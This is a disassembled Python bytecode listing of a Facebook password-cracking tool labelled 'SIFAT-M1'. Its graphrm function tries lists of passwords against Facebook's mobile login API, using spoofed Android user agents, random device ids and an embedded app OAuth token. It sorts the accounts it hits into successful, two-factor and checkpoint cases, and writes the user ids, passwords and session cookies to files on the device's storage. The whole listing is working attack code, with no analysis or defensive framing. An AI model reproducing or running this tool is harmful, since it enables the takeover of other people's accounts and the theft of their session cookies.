  --   L4:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
               RERAISE                  1
ExceptionTable:
  L1 to L4 -> L4 [0] lasti

Disassembly of <code object <genexpr> at 0x6e35da8530, file "<x>", line 128>: 128           RETURN_GENERATOR
               POP_TOP
       L1:     RESUME                   0
               LOAD_FAST                0 (.0)
               GET_ITER
       L2:     FOR_ITER                41 (to L3)
               STORE_FAST               1 (_)
               LOAD_GLOBAL              0 (random)
               LOAD_ATTR                2 (choice)
               PUSH_NULL
               LOAD_GLOBAL              4 (string)
               LOAD_ATTR                6 (digits)
               CALL                     1
               YIELD_VALUE              0
               RESUME                   5
               POP_TOP
               JUMP_BACKWARD           43 (to L2)
       L3:     END_FOR
               POP_TOP
               RETURN_CONST             0 (None)

  --   L4:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
               RERAISE                  1
ExceptionTable:
  L1 to L4 -> L4 [0] lasti

Disassembly of <code object dalvik_ua_pro at 0x6e35daf550, file "<x>", line 142>:
142           RESUME                   0

143           BUILD_LIST               0
              LOAD_CONST               1 (('11', '12', '13', '14', '15'))
              LIST_EXTEND              1
              STORE_FAST               0 (android_versions)

145           BUILD_LIST               0
              LOAD_CONST               2 (('SM-S918B', 'SM-A546E', 'SM-M346B', '2201116SI', '22101316G', 'RMX3760', 'RMX3081', 'CPH2449', 'CPH2467', 'V2230', 'V2149', 'CPH2339', 'CPH2387'))
              LIST_EXTEND              1
              STORE_FAST               1 (devices)

154           BUILD_LIST               0
              LOAD_CONST               3 (('RP1A.200720.012', 'SP1A.210812.016', 'TP1A.220905.004', 'UP1A.231005.007'))
              LIST_EXTEND              1
              STORE_FAST               2 (builds)

161           LOAD_GLOBAL              0 (random)
              LOAD_ATTR                2 (choice)
              PUSH_NULL
              LOAD_FAST                0 (android_versions)
              CALL                     1
              STORE_FAST               3 (android)

162           LOAD_GLOBAL              0 (random)
              LOAD_ATTR                2 (choice)
              PUSH_NULL
              LOAD_FAST                1 (devices)
              CALL                     1
              STORE_FAST               4 (device)

163           LOAD_GLOBAL              0 (random)
              LOAD_ATTR                2 (choice)
              PUSH_NULL
              LOAD_FAST                2 (builds)
              CALL                     1
              STORE_FAST               5 (build)

166           LOAD_CONST               4 ('2.1.0')
              STORE_FAST               6 (dalvik_ver)

168           LOAD_CONST               5 ('Dalvik/')
              LOAD_FAST                6 (dalvik_ver)
              FORMAT_SIMPLE
              LOAD_CONST               6 (' (Linux; U; Android ')
              LOAD_FAST                3 (android)
              FORMAT_SIMPLE
              LOAD_CONST               7 ('; ')
              LOAD_FAST                4 (device)
              FORMAT_SIMPLE
              LOAD_CONST               8 (' Build/')
              LOAD_FAST                5 (build)
              FORMAT_SIMPLE
              LOAD_CONST               9 (')')
              BUILD_STRING             9
              STORE_FAST               7 (ua)

169           LOAD_FAST                7 (ua)
              RETURN_VALUE

Disassembly of <code object graphrm at 0x6eb60ab110, file "<x>", line 175>:
 175            RESUME                   0

 177            BUILD_LIST               0
                STORE_FAST               3 (togg)

 178            LOAD_GLOBAL              0 (sys)
                LOAD_ATTR                2 (stdout)
                LOAD_ATTR                5 (write + NULL|self)
                LOAD_CONST               1 ('')
                LOAD_ATTR                7 (join + NULL|self)
                BUILD_LIST               0
                LOAD_CONST               2 ('\r\r')
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               3 ('[')
                LIST_APPEND              1
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               4 ('SIFAT-M1')
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               5 (']')
                LIST_APPEND              1
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL             14 (E)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               3 ('[')
                LIST_APPEND              1
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL             16 (lop)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               6 ('/')
                LIST_APPEND              1
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_FAST                2 (tid)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               5 (']')
                LIST_APPEND              1
                LOAD_GLOBAL             14 (E)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               3 ('[')
                LIST_APPEND              1
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               7 ('OK')
                LIST_APPEND              1
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               8 (':')
                LIST_APPEND              1
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               9 ('%s')
                LIST_APPEND              1
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               6 ('/')
                LIST_APPEND              1
                LOAD_GLOBAL             18 (S)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               9 ('%s')
                LIST_APPEND              1
                LOAD_GLOBAL              8 (BG)
                FORMAT_SIMPLE
                LIST_APPEND              1
                LOAD_CONST               5 (']')
                LIST_APPEND              1
                LOAD_GLOBAL             14 (E)
                FORMAT_SIMPLE
                LIST_APPEND              1
                CALL                     1
                LOAD_GLOBAL             21 (len + NULL)
                LOAD_GLOBAL             22 (ok)
                CALL                     1
                LOAD_GLOBAL             21 (len + NULL)
                LOAD_GLOBAL             24 (lk)
                CALL                     1
                BUILD_TUPLE              2
                BINARY_OP                6 (%)
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              0 (sys)
                LOAD_ATTR                2 (stdout)
                LOAD_ATTR               27 (flush + NULL|self)
                CALL                     0
                POP_TOP

 179            LOAD_FAST                1 (psd)
                GET_ITER
        L1:     EXTENDED_ARG             4
                FOR_ITER              1219 (to L16)
                STORE_FAST               4 (psw)

 181            LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              10 (100)
                LOAD_CONST              11 (925)
                CALL                     2
                CALL                     1
                LOAD_CONST              12 ('.0.0.')
                BINARY_OP                0 (+)
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              13 (1)
                LOAD_CONST              14 (8)
                CALL                     2
                CALL                     1
                BINARY_OP                0 (+)
                LOAD_CONST              15 ('.')
                BINARY_OP                0 (+)
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              16 (40)
                LOAD_CONST              17 (150)
                CALL                     2
                CALL                     1
                BINARY_OP                0 (+)
                STORE_FAST               5 (vchrome)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              18 (410000000)
                LOAD_CONST              19 (499999999)
                CALL                     2
                STORE_FAST               6 (VAPP)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               34 (choice)
                PUSH_NULL
                LOAD_GLOBAL             36 (xxxxx)
                CALL                     1
                STORE_FAST               7 (gtt)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               34 (choice)
                PUSH_NULL
                LOAD_GLOBAL             36 (xxxxx)
                CALL                     1
                STORE_FAST               8 (gttt)

 182            LOAD_CONST              20 ('Dalvik/2.1.0 (Linux; U; Android ')
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              21 (4)
                LOAD_CONST              22 (13)
                CALL                     2
                FORMAT_SIMPLE
                LOAD_CONST              23 ('; ')
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_FAST                7 (gtt)
                CALL                     1
                FORMAT_SIMPLE
                LOAD_CONST              24 (' Build/QP1A.')
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              25 (111111)
                LOAD_CONST              26 (999999)
                CALL                     2
                FORMAT_SIMPLE
                LOAD_CONST              15 ('.')
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              27 (111)
                LOAD_CONST              28 (999)
                CALL                     2
                FORMAT_SIMPLE
                LOAD_CONST              29 (') ')
                BUILD_STRING             9
                LOAD_CONST              30 ('[FBAN/FB4A;FBAV/347.0.0.3.161;FBBV/229145646;FBDM/{density=3.3,width=1080,height=1430};FBLC/en_GB;FBRV/859351995;FBCR/AT&amp;amp-T;FBMF/Xiaomi;FBBD/Redmi;FBPN/com.facebook.katana;FBDV/Redmi Note 8T;FBSV/9;FBOP/1;FBCA/arm64-v8a:;]')
                BINARY_OP                0 (+)
                STORE_FAST               9 (ua)

 183            BUILD_MAP                0
                LOAD_CONST              31 ('adid')
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             38 (uuid)
                LOAD_ATTR               40 (uuid4)
                PUSH_NULL
                CALL                     0
                CALL                     1
                MAP_ADD                  1
                LOAD_CONST              32 ('format')
                LOAD_CONST              33 ('json')
                MAP_ADD                  1
                LOAD_CONST              34 ('device_id')
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             38 (uuid)
                LOAD_ATTR               40 (uuid4)
                PUSH_NULL
                CALL                     0
                CALL                     1
                MAP_ADD                  1
                LOAD_CONST              35 ('email')
                LOAD_FAST                0 (id)
                MAP_ADD                  1
                LOAD_CONST              36 ('password')
                LOAD_FAST                4 (psw)
                MAP_ADD                  1
                LOAD_CONST              37 ('generate_analytics_claims')
                LOAD_CONST              38 ('1')
                MAP_ADD                  1
                LOAD_CONST              39 ('community_id')
                LOAD_CONST               1 ('')
                MAP_ADD                  1
                LOAD_CONST              40 ('cpl')
                LOAD_CONST              41 ('true')
                MAP_ADD                  1
                LOAD_CONST              42 ('try_num')
                LOAD_CONST              38 ('1')
                MAP_ADD                  1
                LOAD_CONST              43 ('family_device_id')
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             38 (uuid)
                LOAD_ATTR               40 (uuid4)
                PUSH_NULL
                CALL                     0
                CALL                     1
                MAP_ADD                  1
                LOAD_CONST              44 ('credentials_type')
                LOAD_CONST              36 ('password')
                MAP_ADD                  1
                LOAD_CONST              45 ('source')
                LOAD_CONST              46 ('login')
                MAP_ADD                  1
                LOAD_CONST              47 ('error_detail_type')
                LOAD_CONST              48 ('button_with_disabled')
                MAP_ADD                  1
                LOAD_CONST              49 ('enroll_misauth')
                LOAD_CONST              50 ('false')
                MAP_ADD                  1
                LOAD_CONST              51 ('generate_session_cookies')
                LOAD_CONST              38 ('1')
                MAP_ADD                  1
                LOAD_CONST              52 ('generate_machine_id')
                LOAD_CONST              38 ('1')
                MAP_ADD                  1
                LOAD_CONST              53 ('currently_logged_in_userid')
                LOAD_CONST              54 ('0')
                MAP_ADD                  1
                LOAD_CONST              55 ('en_GB')
                LOAD_CONST              56 ('GB')
                LOAD_CONST              57 ('authenticate')
                LOAD_CONST              58 (('locale', 'client_country_code', 'fb_api_req_friendly_name'))
                BUILD_CONST_KEY_MAP      3
                DICT_UPDATE              1
                STORE_FAST              10 (datax)

 184            LOAD_GLOBAL             43 (dalvik_ua_pro + NULL)
                CALL                     0
                LOAD_CONST              59 ('gzip, deflate')
                LOAD_CONST              60 ('*/*')
                LOAD_CONST              61 ('keep-alive')
                LOAD_CONST              62 ('OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32')
                LOAD_CONST              57 ('authenticate')
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              63 (20000)
                LOAD_CONST              64 (40000)
                CALL                     2
                CALL                     1
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              63 (20000)
                LOAD_CONST              64 (40000)
                CALL                     2
                CALL                     1
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_GLOBAL             30 (random)
                LOAD_ATTR               32 (randint)
                PUSH_NULL
                LOAD_CONST              63 (20000)
                LOAD_CONST              64 (40000)
                CALL                     2
                CALL                     1
                LOAD_CONST              65 ('unknown')
                LOAD_CONST              66 ('application/x-www-form-urlencoded')
                LOAD_CONST              67 ('Liger')
                LOAD_CONST              68 (('User-Agent', 'Accept-Encoding', 'Accept', 'Connection', 'Authorization', 'X-FB-Friendly-Name', 'X-FB-Connection-Bandwidth', 'X-FB-Net-HNI', 'X-FB-SIM-HNI', 'X-FB-Connection-Type', 'Content-Type', 'X-FB-HTTP-Engine'))
                BUILD_CONST_KEY_MAP     12
                STORE_FAST              11 (header)

 185            LOAD_CONST              69 ('Login approvals are on. Expect an SMS shortly with a code to use for log in')
                STORE_FAST              12 (twfx)

 186            LOAD_GLOBAL             44 (requests)
                LOAD_ATTR               46 (post)
                PUSH_NULL
                LOAD_CONST              70 ('https://b-graph.facebook.com/auth/login')
                LOAD_FAST_LOAD_FAST    171 (datax, header)
                LOAD_CONST              71 (False)
                LOAD_CONST              72 (('data', 'headers', 'allow_redirects'))
                CALL_KW                  4
                LOAD_ATTR               49 (json + NULL|self)
                CALL                     0
                STORE_FAST              13 (lo)

 187            LOAD_CONST              73 ('session_key')
                LOAD_FAST               13 (lo)
                CONTAINS_OP              0
                EXTENDED_ARG             1
                POP_JUMP_IF_FALSE      340 (to L9)

 188            LOAD_FAST               13 (lo)
                LOAD_CONST              74 ('session_cookies')
                BINARY_SUBSCR
                STORE_FAST              14 (cki)

 189            BUILD_MAP                0
                STORE_FAST              15 (ck)

 190            LOAD_FAST               14 (cki)
                GET_ITER
        L2:     FOR_ITER                28 (to L3)
                STORE_FAST              16 (xk)
                LOAD_FAST               15 (ck)
                LOAD_ATTR               51 (update + NULL|self)
                LOAD_FAST               16 (xk)
                LOAD_CONST              75 ('name')
                BINARY_SUBSCR
                LOAD_FAST               16 (xk)
                LOAD_CONST              76 ('value')
                BINARY_SUBSCR
                BUILD_MAP                1
                CALL                     1
                POP_TOP
                JUMP_BACKWARD           30 (to L2)
        L3:     END_FOR
                POP_TOP

 191            LOAD_CONST              77 (';')
                LOAD_ATTR                7 (join + NULL|self)
                LOAD_FAST               15 (ck)
                LOAD_ATTR               53 (items + NULL|self)
                CALL                     0
                GET_ITER
                LOAD_FAST_AND_CLEAR     17 (key)
                LOAD_FAST_AND_CLEAR     18 (value)
                SWAP                     3
        L4:     BUILD_LIST               0
                SWAP                     2
                GET_ITER
        L5:     FOR_ITER                15 (to L6)
                UNPACK_SEQUENCE          2
                STORE_FAST              17 (key)
                STORE_FAST              18 (value)
                LOAD_FAST               17 (key)
                CONVERT_VALUE            1 (str)
                FORMAT_SIMPLE
                LOAD_CONST              78 ('=')
                LOAD_FAST               18 (value)
                CONVERT_VALUE            1 (str)
                FORMAT_SIMPLE
                BUILD_STRING             3
                LIST_APPEND              2
                JUMP_BACKWARD           17 (to L5)
        L6:     END_FOR
                POP_TOP
        L7:     SWAP                     3
                STORE_FAST              18 (value)
                STORE_FAST              17 (key)
                CALL                     1
                STORE_FAST              19 (coki)

 192            LOAD_GLOBAL             54 (re)
                LOAD_ATTR               56 (findall)
                PUSH_NULL
                LOAD_CONST              79 ('c_user=(.*);xs')
                LOAD_FAST               19 (coki)
                CALL                     2
                LOAD_CONST              80 (0)
                BINARY_SUBSCR
                STORE_FAST              20 (iid)

 193            LOAD_GLOBAL             59 (print + NULL)
                LOAD_CONST               2 ('\r\r')
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LOAD_CONST              81 ('[SIFAT-OK] ')
                LOAD_FAST               20 (iid)
                FORMAT_SIMPLE
                LOAD_CONST              82 (' | ')
                LOAD_FAST                4 (psw)
                FORMAT_SIMPLE
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             60 (os)
                LOAD_ATTR               62 (system)
                PUSH_NULL
                LOAD_CONST              83 ('espeak -a 300 "ok id"')
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             22 (ok)
                LOAD_ATTR               65 (append + NULL|self)
                LOAD_FAST                0 (id)
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             67 (open + NULL)
                LOAD_CONST              84 ('/sdcard/SIFAT-OK.txt')
                LOAD_CONST              85 ('a')
                CALL                     2
                LOAD_ATTR                5 (write + NULL|self)
                LOAD_FAST               20 (iid)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                4 (psw)
                BINARY_OP                0 (+)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                0 (id)
                BINARY_OP                0 (+)
                LOAD_CONST              86 ('  ------------>>>')
                BINARY_OP                0 (+)
                LOAD_FAST               19 (coki)
                BINARY_OP                0 (+)
                LOAD_CONST              87 ('\n')
                BINARY_OP                0 (+)
                CALL                     1
                POP_TOP

 194            LOAD_CONST              88 ('y')
                LOAD_GLOBAL             68 (cokix)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       79 (to L8)
                LOAD_GLOBAL             59 (print + NULL)
                LOAD_CONST               2 ('\r\r')
                LOAD_GLOBAL             70 (R)
                FORMAT_SIMPLE
                LOAD_CONST               3 ('[')
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LOAD_CONST              89 ('COOKIES🍪')
                LOAD_GLOBAL             70 (R)
                FORMAT_SIMPLE
                LOAD_CONST               5 (']')
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LOAD_CONST              90 (' : ')
                LOAD_GLOBAL             12 (G)
                FORMAT_SIMPLE
                LOAD_FAST               19 (coki)
                FORMAT_SIMPLE
                LOAD_GLOBAL             14 (E)
                FORMAT_SIMPLE
                BUILD_STRING            12
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             59 (print + NULL)
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                LOAD_CONST              91 ('----------------------------------------')
                FORMAT_SIMPLE
                LOAD_GLOBAL             14 (E)
                FORMAT_SIMPLE
                BUILD_STRING             3
                CALL                     1
                POP_TOP

 195    L8:     POP_TOP
                EXTENDED_ARG             1
                JUMP_FORWARD           310 (to L17)

 196    L9:     LOAD_FAST               12 (twfx)
                LOAD_GLOBAL             29 (str + NULL)
                LOAD_FAST               13 (lo)
                CALL                     1
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE      128 (to L10)

 197            LOAD_FAST               13 (lo)
                LOAD_CONST              92 ('error')
                BINARY_SUBSCR
                LOAD_CONST              93 ('error_data')
                BINARY_SUBSCR
                LOAD_CONST              94 ('uid')
                BINARY_SUBSCR
                STORE_FAST              20 (iid)

 198            LOAD_GLOBAL             59 (print + NULL)
                LOAD_CONST               2 ('\r\r')
                LOAD_GLOBAL             72 (BL)
                FORMAT_SIMPLE
                LOAD_CONST              95 ('[SIFAT-2F] ')
                LOAD_FAST               20 (iid)
                FORMAT_SIMPLE
                LOAD_CONST              82 (' | ')
                LOAD_FAST                4 (psw)
                FORMAT_SIMPLE
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             60 (os)
                LOAD_ATTR               62 (system)
                PUSH_NULL
                LOAD_CONST              96 ('espeak -a 300 "two,f id"')
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             67 (open + NULL)
                LOAD_CONST              97 ('/sdcard/SIFAT-2F.txt')
                LOAD_CONST              85 ('a')
                CALL                     2
                LOAD_ATTR                5 (write + NULL|self)
                LOAD_FAST               20 (iid)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                4 (psw)
                BINARY_OP                0 (+)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                0 (id)
                BINARY_OP                0 (+)
                LOAD_CONST              87 ('\n')
                BINARY_OP                0 (+)
                CALL                     1
                POP_TOP

 199            LOAD_GLOBAL             74 (twf)
                LOAD_ATTR               65 (append + NULL|self)
                LOAD_FAST                0 (id)
                CALL                     1
                POP_TOP

 200            POP_TOP
                JUMP_FORWARD           167 (to L17)

 201   L10:     LOAD_CONST              98 ('www.facebook.com')
                LOAD_FAST               13 (lo)
                LOAD_CONST              92 ('error')
                BINARY_SUBSCR
                LOAD_CONST              99 ('message')
                BINARY_SUBSCR
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE      150 (to L15)

 202            NOP

 203   L11:     LOAD_FAST               13 (lo)
                LOAD_CONST              92 ('error')
                BINARY_SUBSCR
                LOAD_CONST              93 ('error_data')
                BINARY_SUBSCR
                LOAD_CONST              94 ('uid')
                BINARY_SUBSCR
                STORE_FAST              20 (iid)

 206   L12:     LOAD_FAST               20 (iid)
                LOAD_GLOBAL             22 (ok)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE        1 (to L13)
                JUMP_FORWARD           125 (to L14)

 208   L13:     LOAD_CONST              88 ('y')
                LOAD_GLOBAL             76 (cpx)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE      115 (to L14)

 209            LOAD_GLOBAL             59 (print + NULL)
                LOAD_CONST               2 ('\r\r')
                LOAD_GLOBAL             70 (R)
                FORMAT_SIMPLE
                LOAD_CONST             100 ('[SIFAT-CP] ')
                LOAD_FAST               20 (iid)
                FORMAT_SIMPLE
                LOAD_CONST              82 (' | ')
                LOAD_FAST                4 (psw)
                FORMAT_SIMPLE
                LOAD_GLOBAL             10 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             78 (cp)
                LOAD_ATTR               65 (append + NULL|self)
                LOAD_FAST                0 (id)
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             60 (os)
                LOAD_ATTR               62 (system)
                PUSH_NULL
                LOAD_CONST             101 ('espeak -a 300 "cp id"')
                CALL                     1
                POP_TOP
                LOAD_GLOBAL             67 (open + NULL)
                LOAD_CONST             102 ('/sdcard/SIFAT-CP.txt')
                LOAD_CONST              85 ('a')
                CALL                     2
                LOAD_ATTR                5 (write + NULL|self)
                LOAD_FAST               20 (iid)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                4 (psw)
                BINARY_OP                0 (+)
                LOAD_CONST              82 (' | ')
                BINARY_OP                0 (+)
                LOAD_FAST                0 (id)
                BINARY_OP                0 (+)
                LOAD_CONST              87 ('\n')
                BINARY_OP                0 (+)
                CALL                     1
                POP_TOP

 210   L14:     POP_TOP
                JUMP_FORWARD             5 (to L17)

 211   L15:     EXTENDED_ARG             4
                JUMP_BACKWARD         1222 (to L1)

 179   L16:     END_FOR
                POP_TOP

 212   L17:     LOAD_GLOBAL             16 (lop)
                LOAD_CONST              13 (1)
                BINARY_OP               13 (+=)
                STORE_GLOBAL             8 (lop)
                RETURN_CONST             0 (None)

  --   L18:     SWAP                     2
                POP_TOP

 191            SWAP                     3
                STORE_FAST              18 (value)
                STORE_FAST              17 (key)
                RERAISE                  0

  --   L19:     PUSH_EXC_INFO

 204            POP_TOP

 205            LOAD_FAST                0 (id)
                STORE_FAST              20 (iid)
       L20:     POP_EXCEPT
                JUMP_BACKWARD_NO_INTERRUPT 165 (to L12)

  --   L21:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
ExceptionTable:
  L4 to L7 -> L18 [6]
  L11 to L12 -> L19 [1]
  L19 to L20 -> L21 [2] lasti

[Program finished]
